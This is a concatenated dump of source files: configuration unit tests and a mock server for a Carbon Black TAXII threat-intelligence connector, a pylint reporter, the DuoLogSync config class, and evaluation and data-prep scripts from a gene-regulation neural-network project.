assert "feed_retrieval_minutes' must be between 1 and 43200 (got 100000)" in str(err)
def test_05_host_address(self):
"""
Ensure 'host_address' can be defined.
"""
base = self.minimal()
base['host_address'] = "https://foo.com"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual("https://foo.com", cfg['host_address'])
def test_06_https_proxy(self):
"""
Ensure 'https_proxy' can be defined.
"""
base = self.minimal()
base['https_proxy'] = "https://foo.com"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual("https://foo.com", cfg['https_proxy'])
def test_07_listener_address(self):
"""
Ensure 'listener_address' can be defined.
"""
base = self.minimal()
base['listener_address'] = "https://foo.com"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual("https://foo.com", cfg['listener_address'])
# NOTE: listener_port part of all tests as required value
def test_08a_listener_port_below_minimum(self):
"""
Ensure 'listener_port' minimum is tracked.
"""
base = self.minimal()
base['listener_port'] = "-20"
try:
TaxiiConnectorConfiguration.parse(base)
self.fail("Did not get expected exception!")
except CommonConfigException as err:
assert "'listener_port' must be between 1 and 65535 (got -20)" in str(err)
def test_08b_listener_port_above_maximum(self):
"""
Ensure 'listener_port' maximum is tracked.
"""
base = self.minimal()
base['listener_port'] = "70000"
try:
TaxiiConnectorConfiguration.parse(base)
self.fail("Did not get expected exception!")
except CommonConfigException as err:
assert "'listener_port' must be between 1 and 65535 (got 70000)" in str(err)
def test_09a_log_file_size(self):
"""
Ensure 'log_file_size' can be defined.
"""
base = self.minimal()
base['log_file_size'] = "12345678"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual(12345678, cfg['log_file_size'])
def test_09b_log_file_size(self):
"""
Ensure 'log_file_size' below 0 is tracked.
"""
base = self.minimal()
base['log_file_size'] = "-1"
try:
TaxiiConnectorConfiguration.parse(base)
self.fail("Did not get expected exception!")
except CommonConfigException as err:
assert "log_file_size' must be between 1048576 and 1073741824 (got -1)" in str(err)
def test_10a_log_level(self):
"""
Ensure 'log_level' can be defined.
"""
base = self.minimal()
base['log_level'] = "warning"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual("WARNING", cfg['log_level'])
def test_10b_log_level_unmatched(self):
"""
Ensure an invalid log level reverts to INFO.
"""
base = self.minimal()
base['log_level'] = "warn"
try:
TaxiiConnectorConfiguration.parse(base)
self.fail("Did not get expected exception!")
except CommonConfigException as err:
assert ("Configuration key 'log_level' must be in allowed values "
"['DEBUG', 'INFO', 'WARNING', 'ERROR']") in str(err)
def test_11_multi_core(self):
"""
Ensure 'multi_core' can be defined.
"""
base = self.minimal()
base['multi_core'] = "False"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual(False, cfg['multi_core'])
def test_12_pretty_print_json(self):
"""
Ensure 'multi_core' can be defined.
"""
base = self.minimal()
base['pretty_print_json'] = "true"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual(True, cfg['pretty_print_json'])
# NOTE: carbonblack_server_token part of all tests as required value
def test_13_carbonblack_server_url(self):
"""
Ensure 'carbonblack_server_url' can be defined.
"""
base = self.minimal()
base['carbonblack_server_url'] = "https://foo.com"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual("https://foo.com", cfg['carbonblack_server_url'])
def test_14a_skip_cb_sync(self):
"""
Ensure 'skip_cb_sync' can be defined.
"""
base = self.minimal()
base['skip_cb_sync'] = "True"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual(True, cfg['skip_cb_sync'])
def test_15a_feed_save_mode(self):
"""
Ensure 'feed_save_mode' can be defined.
"""
base = self.minimal()
base['feed_save_mode'] = "Stream"
cfg = TaxiiConnectorConfiguration.parse(base)
self.assertEqual("STREAM", cfg['feed_save_mode'])
self.assertEqual(True, cfg['use_feed_stream'])
def test_15b_save_mode_unmatched(self):
"""
Ensure a feed_save_mode reverts to STREAM with a bad entry.
"""
base = self.minimal()
base['feed_save_mode'] = "Saved"
try:
TaxiiConnectorConfiguration.parse(base)
self.fail("Did not get expected exception!")
except CommonConfigException as err:
assert "Configuration key 'feed_save_mode' must be in allowed values ['STREAM', 'BULK']" in str(err)
```
#### File: cb-taxii-connector/test/test_taxii_server_config.py
```python
import unittest
from unittest import mock
from cbopensource.driver.taxii_server_config import ServerVersion, TaxiiServerConfiguration
from cbopensource.utilities.common_config import CommonConfigException
from taxii2client.common import TokenAuth
class TaxiiServerConfigTests(unittest.TestCase):
def test_01a_server_config_parsed(self):
conf = {"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
conf_as_dict = TaxiiServerConfiguration.parse(conf)
self.assertEqual("http://localhost:5000/taxii2", conf_as_dict['url'])
self.assertEqual("user", conf_as_dict['user'])
self.assertEqual("pass", conf_as_dict['password'])
def test_01b_server_config_inited(self):
conf = {"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
conf_as_dict = TaxiiServerConfiguration.parse(conf)
self.assertEqual("http://localhost:5000/taxii2", conf_as_dict['url'])
self.assertEqual("user", conf_as_dict['user'])
self.assertEqual("pass", conf_as_dict['password'])
def test_02a_server_config_as_object(self):
conf = {"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertEqual("http://localhost:5000/taxii2", tsc['url'])
self.assertEqual("user", tsc['user'])
self.assertEqual("pass", tsc['password'])
def test_02b_server_config_as_object_get(self):
conf = {"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
assert 'verify' not in tsc
def test_03_server_config_defaults(self):
conf = {"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertEqual("http://localhost:5000/taxii2", tsc['url'])
self.assertEqual("user", tsc['user'])
self.assertEqual("pass", tsc['password'])
self.assertEqual(TaxiiServerConfiguration.DEFAULT_SCORE, tsc["score"])
self.assertEqual(TaxiiServerConfiguration.DEFAULT_PAGINATION, tsc["pagination"])
assert 'collections' not in tsc
assert 'version' not in tsc
# NOTE: Since we have defaults handled in the test above, only differences will be checked in folowing tests
def test_04a_server_config_version_20(self):
conf = {"version": "v20", "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertEqual(ServerVersion["V20"], tsc["version"])
def test_04b_server_config_version_21(self):
conf = {"version": "v21", "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertEqual(ServerVersion["V21"], tsc["version"])
def test_04c_server_config_version_bad(self):
conf = {"version": "v23", "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "Version 'V23' not supported, supported versions are V21 and V20" in str(err)
def test_05_server_config_token(self):
conf = {"url": "http://localhost:5000/taxii2", "token": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
assert 'user' not in tsc
assert 'password' not in tsc
self.assertEqual(type(tsc['token']), TokenAuth)
self.assertEqual("averysecrettoken", tsc['token'].key)
def test_06a_server_config_pagination(self):
conf = {"pagination": '77', "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertEqual(77, tsc["pagination"])
def test_06b_server_config_pagination_below_low_bounds(self):
conf = {"pagination": str(TaxiiServerConfiguration.PAGINATION_LOW_BOUNDS - 1), "url": "http://localhost:5000/taxii2",
"username": "user", "password": "<PASSWORD>"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "'pagination' must be between 10 and 1000 (got 9)" in str(err)
def test_06c_server_config_pagination_above_high_bounds(self):
conf = {"pagination": str(TaxiiServerConfiguration.PAGINATION_HIGH_BOUNDS + 1),
"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "'pagination' must be between 10 and 1000 (got 1001)" in str(err)
def test_06d_server_config_pagination_bad_value(self):
conf = {"pagination": "afdsa", "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "Problem with configuration key 'pagination': invalid literal for int()" in str(err)
def test_07a_server_config_collections(self):
conf = {"collections": "collection-id-123456", "url": "http://localhost:5000/taxii2", "username": "user",
"password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertListEqual(["collection-id-123456"], tsc['collections'])
def test_07b_server_config_collections_many(self):
conf = {"collections": "collection-id-123456,collection-id-21234214321,colleciton-id-134124321",
"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertListEqual(["collection-id-123456", "collection-id-21234214321", "colleciton-id-134124321"],
tsc['collections'])
def test_07c_server_config_collections_uniqueness(self):
conf = {"collections": "collection-id-123456,collection-id-123456,colleciton-id-134124321",
"url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "'collections' - List entries must be unique" in str(err)
def test_08a_server_config_ioc_types(self):
conf = {"ioc_types": "address,hash,domain", "collections": "collection-id-123456",
"url": "http://localhost:5000/taxii2", "username": "user",
"password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertListEqual(tsc["ioc_types"], ["address", "domain", "hash"])
def test_08b_server_config_ioc_types_invalid(self):
conf = {"ioc_types": "address,hash,ja3", "url": "http://localhost:5000/taxii2", "username": "user",
"password": "<PASSWORD>"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "'ioc_types' - Acceptable values (case insensitive) are: ['address', 'domain', 'hash']" in str(err)
# NOTE: cannot check ioc_type entries over max count as this is trapped by uniqueness check!
def test_09a_server_config_password_username_paired(self):
conf = {"url": "http://localhost:5000/taxii2", "password": "<PASSWORD>"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "'username' is required when 'password' is specified" in str(err)
def test_09b_server_config_username_password_paired(self):
conf = {"url": "http://localhost:5000/taxii2", "username": "pass"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "'password' is required when 'username' is specified" in str(err)
def test_10a_server_config_url_required(self):
conf = {"password": "<PASSWORD>", "username": "user"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "Configuration key 'url' is required" in str(err)
def test_10b_server_config_url_format(self):
conf = {"url": "htp://afdsfdasfdsa!$%", "password": "<PASSWORD>", "username": "user"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "Server url must match required format http(s)://<server>[:port]/taxii2" in str(err)
def test_11a_server_config_score(self):
conf = {"score": '25', "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertEqual(25, tsc["score"])
def test_11b_server_config_score_bad_value(self):
conf = {"score": "<PASSWORD>", "url": "http://localhost:5000/taxii2", "username": "user", "password": "<PASSWORD>"}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "Problem with configuration key 'score': invalid literal for int()" in str(err)
@mock.patch("cbopensource.driver.taxii_server_config.os.path.exists")
def test_12a_server_config_cert(self, os_path_exists):
os_path_exists.return_value = True
conf = {"url": "http://localhost:5000/taxii2", "cert": "/path/to/cert.pem", "score": '99',
"verify": 'true'}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertEqual("/path/to/cert.pem", tsc["cert"])
@mock.patch("os.path.exists")
def test_12b_server_config_cert_and_key(self, os_path_exists_mock):
os_path_exists_mock.return_value = True
conf = {"url": "http://localhost:5000/taxii2", "cert": "/path/to/cert,/path/to/key", "score": '99',
"verify": 'true'}
tsc = TaxiiServerConfiguration.parse(conf)
self.assertTupleEqual(("/path/to/cert", "/path/to/key"), tsc['cert'])
@mock.patch("os.path.exists")
def test_12c_server_config_cert_does_not_exist(self, os_path_exists_mock):
os_path_exists_mock.return_value = False
conf = {"url": "http://localhost:5000/taxii2", "cert": "/path/to/nothing", "score": '99',
"verify": 'true'}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert "does not exist" in str(err)
@mock.patch("cbopensource.driver.taxii_server_config.os.path.exists")
def test_12d_server_config_cert_too_many_entries(self, os_path_exists):
os_path_exists.return_value = True
conf = {"url": "http://localhost:5000/taxii2",
"cert": "/path/to/cert, /path/to/other, /yet/another/path", "score": '99',
"verify": 'true'}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert ("'cert' must be specified as the path to a .pem encoded cert+key pair or the comma separated"
" paths to a cert and a key file") in str(err)
def test_13_server_config_verify_bad(self):
conf = {"url": "http://localhost:5000/taxii2", "score": '99', "verify": 'trueafdsa'}
try:
TaxiiServerConfiguration.parse(conf)
self.fail("Did not see expected exception!")
except CommonConfigException as err:
assert ("Problem with configuration key 'verify': Only case-insensitive values "
"of 'true' or 'false' are allowed") in str(err)
if __name__ == '__main__':
unittest.main()
```
#### File: test/utils/generate_taxii_data.py
```python
import json
import stix2generator
config = stix2generator.generation.object_generator.TaxiiConnectorConfiguration(optional_property_probability=.25,
minimize_ref_properties=False)
object_generator = stix2generator.create_object_generator(object_generator_config=config)
def generate_random_indicator():
return object_generator.generate('indicator')
def get_manifest_for_indicator(indicator):
return {
"date_added": indicator["modified"],
"id": indicator["id"],
"media_type": "application/stix+json;version=2.1",
"version": indicator["modified"]
}
def generate_collection(n=100):
collection_data = {"objects":[], "manifest":[]}
for i in range(0,n):
indicator = generate_random_indicator()
manifest = get_manifest_for_indicator(indicator)
collection_data["objects"].append(indicator)
collection_data["manifest"].append(manifest)
return collection_data
print(json.dumps(generate_collection(12)))
```
#### File: test/utils/taxii_server.py
```python
import logging
import os
from medallion import (
application_instance, register_blueprints, set_config
)
log = logging.getLogger("medallion")
current_path = os.path.dirname(os.path.abspath(__file__))
configuration = {
"taxii": {"max_page_size": 100},
"backend": {"module": "medallion.backends.memory_backend", "module_class": "MemoryBackend",
"filename": f"{current_path}/mock_taxii_data.json"}
}
def start_taxii_server():
log.setLevel("DEBUG")
set_config(application_instance, "users", configuration)
set_config(application_instance, "taxii", configuration)
set_config(application_instance, "backend", configuration)
register_blueprints(application_instance)
application_instance.run()
``` |
{
"source": "jjfallete/duo_log_sync",
"score": 2
} |
#### File: _ci/lib/pylint_to_gitlab_codeclimate.py
```python
import hashlib
import six
import sys
from pylint.interfaces import IReporter
from pylint.reporters import JSONReporter
from pylint.lint import Run
# small portions taken from https://github.com/mercos/codeclimate-pylint
# no copyright or license was asserted as of February 2020
class GitlabCodeClimateReporter(JSONReporter):
__implements__ = IReporter
name = "gitlabcodeclimate"
def handle_message(self, msg):
codeclimate_dict = dict()
message_lines = self._parse_message(msg.msg).splitlines()
codeclimate_dict["description"] = message_lines[0]
location = dict()
location["path"] = msg.path
# gitlab only uses the "lines.begin" version of location
location["lines"] = {"begin": msg.line}
codeclimate_dict["location"] = location
# gitlab needs a fingerprint
# hash the issue, filename and line number
codeclimate_dict["fingerprint"] = hashlib.sha256(
(msg.symbol + msg.path + six.text_type(msg.line)).encode()
).hexdigest()
self.messages.append(codeclimate_dict)
def _parse_message(self, message):
while " " in message:
message = message.replace(" ", " ")
message = message.replace('"', "`")
message = message.replace("\\", "")
return message
if __name__ == "__main__":
Run(sys.argv[1:], reporter=GitlabCodeClimateReporter(), do_exit=False)
```
#### File: duo_log_sync/duologsync/config.py
```python
from datetime import datetime, timedelta
from cerberus import Validator, schema_registry
import yaml
from yaml import YAMLError
from duologsync.program import Program
class Config:
"""
This class is unique in that no instances of it should be created. It is
used as a wrapper around a Dictionary object named config that is contains
important values used throughout DuoLogSync. The _config class variable
should only be accessed through getter and setter methods and should only
be set once. There are useful methods defined in this class for generating
a config Dictionary from a YAML file, validating the config against a
Schema and setting defaults for a config Dictionary when optional fields
are not given values.
"""
# Format type constants
CEF = 'CEF'
JSON = 'JSON'
# Log type constants
ADMIN = 'adminaction'
AUTH = 'auth'
TELEPHONY = 'telephony'
TRUST_MONITOR = 'trustmonitor'
DIRECTORY_DEFAULT = '/tmp'
LOG_FILEPATH_DEFAULT = DIRECTORY_DEFAULT + '/' + 'duologsync.log'
LOG_FORMAT_DEFAULT = 'JSON'
API_OFFSET_DEFAULT = 180
API_TIMEOUT_DEFAULT = 120
CHECKPOINTING_ENABLED_DEFAULT = False
CHECKPOINTING_DIRECTORY_DEFAULT = DIRECTORY_DEFAULT
PROXY_SERVER_DEFAULT = ''
PROXY_PORT_DEFAULT = 0
# To understand these schema definitions better, compare side-by-side to
# the template_config.yml file
# Version of the config file
VERSION = {
'type': 'string',
'empty': False,
'required': True
}
# Fields for changing the functionality of DuoLogSync
DLS_SETTINGS = {
'type': 'dict',
'default': {},
'schema': {
'log_filepath': {
'type': 'string',
'empty': False,
'default': LOG_FILEPATH_DEFAULT
},
'log_format': {
'type': 'string',
'empty': False,
'allowed': [CEF, JSON],
'default': LOG_FORMAT_DEFAULT
},
'api': {
'type': 'dict',
'default': {},
'schema': {
'offset': {
'type': 'number',
'min': 0,
'max': 180,
'default': API_OFFSET_DEFAULT
},
'timeout': {
'type': 'number',
'default': API_TIMEOUT_DEFAULT
}
}
},
'checkpointing': {
'type': 'dict',
'default': {},
'schema': {
'enabled': {
'type': 'boolean',
'default': CHECKPOINTING_ENABLED_DEFAULT
},
'directory': {
'type': 'string',
'empty': False,
'default': CHECKPOINTING_DIRECTORY_DEFAULT}
}
},
'proxy': {
'type': 'dict',
'default': {},
'schema': {
'proxy_server': {
'type': 'string',
'default': PROXY_SERVER_DEFAULT
},
'proxy_port': {
'type': 'number',
'default': PROXY_PORT_DEFAULT
}
}
}
}
}
# Schema for a server inside of servers list
schema_registry.add(
'server',
{
'id': {'type': 'string', 'required': True, 'empty': False},
'hostname': {'type': 'string', 'required': True, 'empty': False},
'port': {
'type': 'integer',
'required': True,
'min': 0,
'max': 65535
},
'protocol': {
'type': 'string',
'required': True,
'oneof': [
{
'allowed': ['TCPSSL'],
'dependencies': ['cert_filepath']
},
{'allowed': ['TCP', 'UDP']}
]
},
'cert_filepath': {'type': 'string', 'empty': False}
})
# List of servers and how DLS will communicate with them
SERVERS = {
'type': 'list',
'required': True,
'minlength': 1,
'schema': {'type': 'dict', 'schema': 'server'}
}
# Describe which servers the logs of certain endpoints should be sent to
schema_registry.add(
'endpoint_server_mapping',
{
'server': {
'type': 'string',
'empty': False,
'required': True
},
'endpoints': {
'type': 'list',
'empty': False,
'required': True,
'allowed': [ADMIN, AUTH, TELEPHONY, TRUST_MONITOR]
}
}
)
# Account definition, which is used to access Duo logs and tell DLS which
# logs to fetch and to which servers those logs should be sent
ACCOUNT = {
'type': 'dict',
'required': True,
'schema': {
'skey': {'type': 'string', 'required': True, 'empty': False},
'ikey': {'type': 'string', 'required': True, 'empty': False},
'hostname': {'type': 'string', 'required': True, 'empty': False},
'endpoint_server_mappings': {
'type': 'list',
'empty': False,
'required': True,
'schema': {'type': 'dict', 'schema': 'endpoint_server_mapping'}
},
'is_msp': {'type': 'boolean', 'default': False},
'block_list': {'type': 'list', 'default': []}
}
}
# Schema for validating the structure of a config dictionary generated from
# a user-provided YAML file
SCHEMA = {
'version': VERSION,
'dls_settings': DLS_SETTINGS,
'servers': SERVERS,
'account': ACCOUNT
}
# Generate a Validator object with the given schema
SCHEMA_VALIDATOR = Validator(SCHEMA)
# Private class variable, should not be accessed directly, only through
# getter and setter methods
_config = None
# Used to ensure that the _config variable is set once and only once
_config_is_set = False
@classmethod
def _check_config_is_set(cls):
"""
Used to check that this Config object is set before trying to access
or set values
"""
if cls._config_is_set:
return
raise RuntimeError('Cannot access values of config before setting it')
@classmethod
def set_config(cls, config):
"""
Function used to set the config of a Config object once and only once.
@param config Dictionary used to set a Config object's 'config'
instance variable
"""
if cls._config_is_set:
raise RuntimeError('Config object already set. Cannot set Config '
'object more than once')
cls._config = config
cls._config_is_set = True
@classmethod
def get_value(cls, keys):
"""
Getter for a Config object's 'config' instance variable
"""
cls._check_config_is_set()
curr_value = cls._config
for key in keys:
curr_value = curr_value.get(key)
if curr_value is None:
raise ValueError(f"{key} is an invalid key for this Config")
return curr_value
@classmethod
def get_log_filepath(cls):
"""@return the filepath where DLS program messages should be saved"""
return cls.get_value(['dls_settings', 'log_filepath'])
@classmethod
def get_log_format(cls):
"""@return how Duo logs should be formatted"""
return cls.get_value(['dls_settings', 'log_format'])
@classmethod
def get_api_offset(cls):
"""@return the timestamp from which record retrieval should begin"""
return cls.get_value(['dls_settings', 'api', 'offset'])
@classmethod
def get_api_timeout(cls):
"""@return the seconds to wait between API calls"""
return cls.get_value(['dls_settings', 'api', 'timeout'])
@classmethod
def get_checkpointing_enabled(cls):
"""@return whether checkpoint files should be used to recover offsets"""
return cls.get_value(['dls_settings', 'checkpointing', 'enabled'])
@classmethod
def get_checkpoint_dir(cls):
"""@return the directory where checkpoint files should be stored"""
return cls.get_value(
['dls_settings', 'checkpointing', 'directory'])
@classmethod
def get_servers(cls):
"""@return the list of servers to which Duo logs will be written"""
return cls.get_value(['servers'])
@classmethod
def get_account_ikey(cls):
"""@return the ikey of the account in config"""
return cls.get_value(['account', 'ikey'])
@classmethod
def get_account_skey(cls):
"""@return the skey of the account in config"""
return cls.get_value(['account', 'skey'])
@classmethod
def get_account_hostname(cls):
"""@return the hostname of the account in config"""
return cls.get_value(['account', 'hostname'])
@classmethod
def get_account_endpoint_server_mappings(cls):
"""@return the endpoint_server_mappings of the account in config"""
return cls.get_value(['account', 'endpoint_server_mappings'])
@classmethod
def get_account_block_list(cls):
"""@return the block_list of the account in config"""
return cls.get_value(['account', 'block_list'])
@classmethod
def account_is_msp(cls):
"""@return whether the account in config is an MSP account"""
return cls.get_value(['account', 'is_msp'])
@classmethod
def get_proxy_server(cls):
"""@return the proxy_server in config"""
return cls.get_value(['dls_settings', 'proxy', 'proxy_server'])
@classmethod
def get_proxy_port(cls):
"""@return the proxy_port in config"""
return cls.get_value(['dls_settings', 'proxy', 'proxy_port'])
@classmethod
def create_config(cls, config_filepath):
"""
Attemp to read the file at config_filepath and generate a config
Dictionary object based on a defined JSON schema
@param config_filepath File from which to generate a config object
"""
shutdown_reason = None
try:
with open(config_filepath) as config_file:
# PyYAML gives better error messages for streams than for files
config_file_data = config_file.read()
config = yaml.full_load(config_file_data)
# Check config against a schema to ensure all the needed fields
# and values are defined
config = cls._validate_and_normalize_config(config)
if config.get('dls_settings').get('api').get('timeout') < cls.API_TIMEOUT_DEFAULT:
config['dls_settings']['api']['timeout'] = cls.API_TIMEOUT_DEFAULT
Program.log('DuoLogSync: Setting default api timeout to 120 seconds.')
# Will occur when given a bad filepath or a bad file
except OSError as os_error:
shutdown_reason = f"{os_error}"
Program.log('DuoLogSync: Failed to open the config file. Check '
'that the filename is correct')
# Will occur if the config file does not contain valid YAML
except YAMLError as yaml_error:
shutdown_reason = f"{yaml_error}"
Program.log('DuoLogSync: Failed to parse the config file. Check '
'that the config file has valid YAML.')
# Validation of the config against a schema failed
except ValueError:
shutdown_reason = f"{cls.SCHEMA_VALIDATOR.errors}"
Program.log('DuoLogSync: Validation of the config file failed. '
'Check that required fields have proper values.')
# No exception raised during the try block, return config
else:
# Calculate offset as a timestamp and rewrite its value in config
offset = config.get('dls_settings').get('api').get('offset')
offset = datetime.utcnow() - timedelta(days=offset)
config['dls_settings']['api']['offset'] = int(offset.timestamp())
return config
# At this point, it is guaranteed that an exception was raised, which
# means that it is shutdown time
Program.initiate_shutdown(shutdown_reason)
return None
@classmethod
def _validate_and_normalize_config(cls, config):
"""
Use a schema and the cerberus library to validate that the given config
dictionary has a valid structure
@param config Dictionary for which to validate the structure
"""
# Config is not a valid structure
if not cls.SCHEMA_VALIDATOR.validate(config):
raise ValueError
config = cls.SCHEMA_VALIDATOR.normalized(config)
return config
@staticmethod
def get_value_from_keys(dictionary, keys):
"""
Drill down into dictionary to retrieve a value given a list of keys
@param dictionary dict to retrieve a value from
@param fields List of fields to follow to retrieve a value
@return value from the log found after following the list of keys given
"""
value = dictionary
for key in keys:
value = value.get(key)
if value is None:
break
return value
```
#### File: duologsync/consumer/trustmonitor_consumer.py
```python
from duologsync.config import Config
from duologsync.consumer.consumer import Consumer
class TrustMonitorConsumer(Consumer):
"""
An implementation of the Consumer class for trust monitor logs
"""
def __init__(self, log_format, log_queue, writer, child_account_id=None):
super().__init__(log_format, log_queue, writer, child_account_id=child_account_id)
self.log_type = Config.TRUST_MONITOR
``` |
{
"source": "jjfeng/CNNC",
"score": 2
} |
#### File: jjfeng/CNNC/evaluate_easiernet_folds.py
```python
import argparse
import sys
import json
import pickle
import logging
import numpy as np
import pandas as pd
import torch
from spinn2.evaluate_siernet_folds import eval_fold_models
from spinn2.network import SierNet, VGGSierNet
from train_with_labels_wholedatax_easiernet import load_data_TF2
def parse_args(args):
""" parse command line arguments """
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument(
"--seed",
type=int,
help="Random number generator seed for replicability",
default=12,
)
parser.add_argument("--model-path", type=str, default="_output/nn.pt")
parser.add_argument(
"--is-vgg", action="store_true",
)
parser.add_argument("--fold-idxs-file", type=str, default=None)
parser.add_argument(
"--data-path", type=str
)
parser.add_argument(
"--num-tf", type=int, default=2
)
parser.add_argument(
"--exclude-tf", type=int, default=1
)
parser.add_argument(
"--do-binary", action="store_true", default=False, help="fit binary outcome"
)
parser.add_argument("--out-file", type=str, default="_output/eval.json")
parser.add_argument("--log-file", type=str, default="_output/eval_nn.txt")
parser.set_defaults()
args = parser.parse_args()
return args
def load_easier_nets(model_file, is_vgg):
meta_state_dict = torch.load(model_file)
all_models = []
for fold_dicts in meta_state_dict["state_dicts"]:
init_models = []
for fold_state_dict in fold_dicts:
if is_vgg:
model = VGGSierNet(
n_inputs=(meta_state_dict["n_inputs"],meta_state_dict["n_inputs"]),
n_out=meta_state_dict["n_out"],
input_filter_layer=meta_state_dict["input_filter_layer"],
)
else:
model = SierNet(
n_layers=meta_state_dict["n_layers"],
n_input=meta_state_dict["n_inputs"],
n_hidden=meta_state_dict["n_hidden"],
n_out=meta_state_dict["n_out"],
input_filter_layer=meta_state_dict["input_filter_layer"],
)
model.load_state_dict(fold_state_dict)
init_models.append(model)
model.get_net_struct()
all_models.append(init_models)
return all_models, meta_state_dict
def main(args=sys.argv[1:]):
args = parse_args(args)
print(args)
logging.basicConfig(
format="%(message)s", filename=args.log_file, level=logging.DEBUG
)
logging.info(str(args))
np.random.seed(args.seed)
#####
# Load data
#####
x_trains = []
y_trains = []
whole_data_TF = [i for i in range(args.num_tf) if i != args.exclude_tf]
for tf_idx in whole_data_TF:
x_train, y_train, _ = load_data_TF2([tf_idx],args.data_path,binary_outcome=args.do_binary,flatten=not args.is_vgg)
x_trains.append(x_train)
y_trains.append(y_train)
if args.is_vgg:
x_trains = [x.reshape((x.shape[0], 1, x.shape[1], x.shape[2])) for x in x_trains]
# Load folds
with open(args.fold_idxs_file, "rb") as f:
fold_idx_dicts = pickle.load(f)
num_folds = len(fold_idx_dicts)
# Load models and evaluate them on folds, take the average
all_models, meta_state_dict = load_easier_nets(args.model_path, args.is_vgg)
all_losses = []
for fold_idx, fold_dict in enumerate(fold_idx_dicts):
test_x = np.concatenate([x_trains[i] for i in fold_dict["test"]], axis=0)
test_y = np.concatenate([y_trains[i] for i in fold_dict["test"]], axis=0).reshape((-1,1))
fold_models = [seed_fold_models[fold_idx] for seed_fold_models in all_models]
empirical_loss = eval_fold_models(test_x, test_y, fold_models)
all_losses.append(empirical_loss)
avg_loss = np.mean(all_losses)
# Store the ensemble results
meta_state_dict.pop("state_dicts", None)
meta_state_dict.pop("weight", None)
meta_state_dict["cv_loss"] = float(avg_loss)
meta_state_dict["seed_losses"] = list(map(float, all_losses))
print(meta_state_dict)
json.dump(meta_state_dict, open(args.out_file, "w"))
if __name__ == "__main__":
main(sys.argv[1:])
```
#### File: jjfeng/CNNC/get_xy_label_data_cnn_combine_from_database.py
```python
import pandas as pd
from numpy import *
import json, re,os, sys
save_dir_name = sys.argv[8]
save_dir = os.path.join(os.getcwd(),save_dir_name)
if not os.path.isdir(save_dir):
os.makedirs(save_dir)
def get_gene_list_bulk(file_name):
import re
h={}
s = open(file_name,'r') #gene symbol ID list of bulk RNA-seq
for line in s:
search_result = re.search(r'^([^\s]+)\s+([^\s]+)',line)
h[search_result.group(1).lower()]=search_result.group(2) # h [gene symbol] = gene ID
s.close()
return h
def get_gene_list(file_name):
import re
h={}
s = open(file_name,'r') #gene symbol ID list of sc RNA-seq
for line in s:
search_result = re.search(r'^([^\s]+)\s+([^\s]+)',line)
h[search_result.group(1).lower()]=search_result.group(2) # h [gene symbol] = gene ID
s.close()
return h
def get_sepration_index (file_name):
import numpy as np
index_list = []
s = open(file_name, 'r')
for line in s:
index_list.append(int(line))
return (np.array(index_list))
# Script starts from here
if len(sys.argv) < 9:
print ('No enough input files')
sys.exit()
if not sys.argv[1] == 'None':
h_gene_list_bulk =get_gene_list_bulk(sys.argv[1]) #'bulk_gene_list.txt')#
print ('read bulk gene list')
